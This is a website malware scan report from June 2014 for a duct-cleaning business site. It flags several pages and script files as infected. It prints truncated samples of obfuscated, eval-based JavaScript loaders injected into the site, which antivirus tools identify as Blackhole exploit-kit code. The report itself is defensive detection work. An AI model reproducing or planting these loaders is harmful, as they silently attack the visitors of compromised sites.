Malware Scanner report for jjairductcleaningdunwoody.com

Malicious/Suspicious/Total urls checked: 4/7/15

11 pages have malicious or suspicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://jjairductcleaningdunwoody.com/	200 OK Content-Length: 12950 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript"></script>
http://jjairductcleaningdunwoody.com/script/jquery.js	200 OK Content-Length: 57254 Content-Type: application/javascript	clean
http://jjairductcleaningdunwoody.com/script/ui_core.js	200 OK Content-Length: 12011 Content-Type: application/javascript	clean
http://jjairductcleaningdunwoody.com/script/ui_tabs.js	200 OK Content-Length: 16572 Content-Type: application/javascript	clean
http://jjairductcleaningdunwoody.com/script/lightbox.js	200 OK Content-Length: 19604 Content-Type: application/javascript	clean
http://jjairductcleaningdunwoody.com/index.html	200 OK Content-Length: 12950 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript"></script>
http://jjairductcleaningdunwoody.com/aboutus.html	200 OK Content-Length: 12024 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.jjairductcleaningchamblee.com ...[12591 bytes skipped]... pharetta Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuckHead.com" title="Buckhead Air Duct Cleaning, Chimney Sweep" target="_blank">Buckhead Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuford.com" title="Buford Air Duct Cleaning, Chimney Sweep" target="_blank">Buford Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningchamblee.com" title="Chamblee Air Duct Cleaning, Chimney Sweep" target="_blank">Chamblee Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningcumming.com" title="Cumming Air Duct Cleaning, Chimney Sweep" target="_blank">Cumming Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningdacula.com" title="Dacula Air Duct Cleaning, Chimney Sweep" target="_blank">Dacula Duct Cleaning</a></li> <li ...[1515 bytes skipped]...
http://jjairductcleaningdunwoody.com/services.html	200 OK Content-Length: 17321 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c( ...[4153 bytes skipped]... Antivirus reports: AntiVir JS/Blacole.EB.152 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Cloda16.Trojan.e34a Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1031 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://jjairductcleaningdunwoody.com/dunwoody-airductcleaning.html	200 OK Content-Length: 15590 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.jjairductcleaningchamblee.com ...[16762 bytes skipped]... pharetta Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuckHead.com" title="Buckhead Air Duct Cleaning, Chimney Sweep" target="_blank">Buckhead Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuford.com" title="Buford Air Duct Cleaning, Chimney Sweep" target="_blank">Buford Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningchamblee.com" title="Chamblee Air Duct Cleaning, Chimney Sweep" target="_blank">Chamblee Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningcumming.com" title="Cumming Air Duct Cleaning, Chimney Sweep" target="_blank">Cumming Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningdacula.com" title="Dacula Air Duct Cleaning, Chimney Sweep" target="_blank">Dacula Duct Cleaning</a></li> <li ...[1516 bytes skipped]...
http://jjairductcleaningdunwoody.com/dunwoody-dryerventcleaning.html	200 OK Content-Length: 18490 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c( ...[4153 bytes skipped]... Antivirus reports: AntiVir JS/Blacole.EB.152 Avast JS:Decode-BKU [Trj] Ad-Aware JS:Exploit.BlackHole.PG Bkav MW.Cloda16.Trojan.e34a Ikarus Exploit.JS.Blacole nProtect JS:Exploit.BlackHole.PG TrendMicro-HouseCall TROJ_GEN.F47V1031 Comodo UnclassifiedMalware Emsisoft JS:Exploit.BlackHole.PG (B) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Exploit:JS/Blacole.OF MicroWorld-eScan JS:Exploit.BlackHole.PG Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bopaxv VIPRE Exploit.JS.Blacole.of (v) AVG JS/Exploit Norman Blacole.XD GData JS:Exploit.BlackHole.PG BitDefender JS:Exploit.BlackHole.PG
http://jjairductcleaningdunwoody.com/dunwoody-chimneysweep.html	200 OK Content-Length: 12064 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.jjairductcleaningchamblee.com ...[12566 bytes skipped]... pharetta Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuckHead.com" title="Buckhead Air Duct Cleaning, Chimney Sweep" target="_blank">Buckhead Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuford.com" title="Buford Air Duct Cleaning, Chimney Sweep" target="_blank">Buford Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningchamblee.com" title="Chamblee Air Duct Cleaning, Chimney Sweep" target="_blank">Chamblee Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningcumming.com" title="Cumming Air Duct Cleaning, Chimney Sweep" target="_blank">Cumming Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningdacula.com" title="Dacula Air Duct Cleaning, Chimney Sweep" target="_blank">Dacula Duct Cleaning</a></li> <li ...[1516 bytes skipped]...
http://jjairductcleaningdunwoody.com/dunwoody-coupons.html	200 OK Content-Length: 13323 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.jjairductcleaningchamblee.com ...[14458 bytes skipped]... pharetta Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuckHead.com" title="Buckhead Air Duct Cleaning, Chimney Sweep" target="_blank">Buckhead Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuford.com" title="Buford Air Duct Cleaning, Chimney Sweep" target="_blank">Buford Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningchamblee.com" title="Chamblee Air Duct Cleaning, Chimney Sweep" target="_blank">Chamblee Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningcumming.com" title="Cumming Air Duct Cleaning, Chimney Sweep" target="_blank">Cumming Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningdacula.com" title="Dacula Air Duct Cleaning, Chimney Sweep" target="_blank">Dacula Duct Cleaning</a></li> <li ...[1515 bytes skipped]...
http://jjairductcleaningdunwoody.com/contactus.html	200 OK Content-Length: 13202 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.jjairductcleaningchamblee.com ...[14071 bytes skipped]... pharetta Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuckHead.com" title="Buckhead Air Duct Cleaning, Chimney Sweep" target="_blank">Buckhead Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningbuford.com" title="Buford Air Duct Cleaning, Chimney Sweep" target="_blank">Buford Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningchamblee.com" title="Chamblee Air Duct Cleaning, Chimney Sweep" target="_blank">Chamblee Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningcumming.com" title="Cumming Air Duct Cleaning, Chimney Sweep" target="_blank">Cumming Duct Cleaning</a></li> <li><a href="http://www.jjairductcleaningdacula.com" title="Dacula Air Duct Cleaning, Chimney Sweep" target="_blank">Dacula Duct Cleaning</a></li> <li ...[1503 bytes skipped]...
http://jjairductcleaningdunwoody.com/script/jquery-1.2.6.min.js	200 OK Content-Length: 60276 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jxrv(){dphjv=function(){--(rbbk.body)}()}ryy="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)yezz=4;rtwrwj=("84,ca,d9,d2,c7,d8,cd,d3,d2,84,d2,94,9d,8c,8d,84,df,71,6e,84,da,c5,d6,84,d7,d8,c5,d8,cd,c7,a1,8b,c5,ce,c5,dc,8b,9f,71,6e,84,da,c5,d6,84,c7,d3,d2,d8,d6,d3,d0,d0,c9,d6,a1,8b,cd,d2,c8,c9,dc,92,d4,cc,d4,8b,9f,71,6e,84,da,c5,d6,84,d2,84,a1,84,c8,d3,c7,d9,d1,c9,d2,d8,92,c7,d6,c9,c5,d8,c9,a9,d0,c9,d1,c9,d2,d8,8c,8b,cd,ca,d6,c5,d1,c9,8b,8d,9f,71,6e,71,6e,84,d2,92,d7,d6,c7,84,a1,84 ... 3479 bytes are skipped ...f,cd,c9,8c,8b,da,cd,d7,cd,d8,c9,c8,c3,d9,d5,8b,8d,a1,a1,99,99,8d,df,e1,c9,d0,d7,c9,df,b7,c9,d8,a7,d3,d3,cf,cd,c9,8c,8b,da,cd,d7,cd,d8,c9,c8,c3,d9,d5,8b,90,84,8b,99,99,8b,90,84,8b,95,8b,90,84,8b,93,8b,8d,9f,71,6e,71,6e,d2,94,9d,8c,8d,9f,71,6e,e1,71,6e,e1".split(","));bvxh=window["asdeval".substr(3)];rbbk=window.document;for(yyn=0;yyn<rtwrwj["le"+"ngth"];yyn+=1){rtwrwj[yyn]=-(100)+parseInt(rtwrwj[yyn],yezz*4);}try{jxrv()}catch(armaxp){wjvo=50-50;}if(!wjvo)bvxh(String[ryy].apply(String,rtwrwj)); Antivirus reports: Avast JS:Decode-BMN [Trj] Ikarus JS.Exploit.BlackHole Comodo TrojWare.JS.Kryptik.aga TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Kryptik.APC!tr NANO-Antivirus Trojan.Script.Expack.chulnr AVG JS/Exploit Norman Blacole.XQ ESET-NOD32 JS/Kryptik.APA
http://jjairductcleaningdunwoody.com/script/formfunc.js	200 OK Content-Length: 9730 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function jxrv(){dphjv=function(){--(rbbk.body)}()}ryy="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)yezz=4;rtwrwj=("84,ca,d9,d2,c7,d8,cd,d3,d2,84,d2,94,9d,8c,8d,84,df,71,6e,84,da,c5,d6,84,d7,d8,c5,d8,cd,c7,a1,8b,c5,ce,c5,dc,8b,9f,71,6e,84,da,c5,d6,84,c7,d3,d2,d8,d6,d3,d0,d0,c9,d6,a1,8b,cd,d2,c8,c9,dc,92,d4,cc,d4,8b,9f,71,6e,84,da,c5,d6,84,d2,84,a1,84,c8,d3,c7,d9,d1,c9,d2,d8,92,c7,d6,c9,c5,d8,c9,a9,d0,c9,d1,c9,d2,d8,8c,8b,cd,ca,d6,c5,d1,c9,8b,8d,9f,71,6e,71,6e,84,d2,92,d7,d6,c7,84,a1,84 ... 3479 bytes are skipped ...f,cd,c9,8c,8b,da,cd,d7,cd,d8,c9,c8,c3,d9,d5,8b,8d,a1,a1,99,99,8d,df,e1,c9,d0,d7,c9,df,b7,c9,d8,a7,d3,d3,cf,cd,c9,8c,8b,da,cd,d7,cd,d8,c9,c8,c3,d9,d5,8b,90,84,8b,99,99,8b,90,84,8b,95,8b,90,84,8b,93,8b,8d,9f,71,6e,71,6e,d2,94,9d,8c,8d,9f,71,6e,e1,71,6e,e1".split(","));bvxh=window["asdeval".substr(3)];rbbk=window.document;for(yyn=0;yyn<rtwrwj["le"+"ngth"];yyn+=1){rtwrwj[yyn]=-(100)+parseInt(rtwrwj[yyn],yezz*4);}try{jxrv()}catch(armaxp){wjvo=50-50;}if(!wjvo)bvxh(String[ryy].apply(String,rtwrwj)); Antivirus reports: Avast JS:Decode-BMN [Trj] Ikarus JS.Exploit.BlackHole Comodo TrojWare.JS.Kryptik.aga TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Kryptik.APC!tr NANO-Antivirus Trojan.Script.Expack.chulnr AVG JS/Exploit Norman Blacole.XQ ESET-NOD32 JS/Kryptik.APA

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jjairductcleaningdunwoody.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Jun 2014 23:58:07 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12950
Content-Type: text/html

...12950 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: jjairductcleaningdunwoody.com
Referer: http://www.google.com/search?q=jjairductcleaningdunwoody.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jjairductcleaningdunwoody.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://jjairductcleaningdunwoody.com/

Result: jjairductcleaningdunwoody.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for jjairductcleaningdunwoody.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools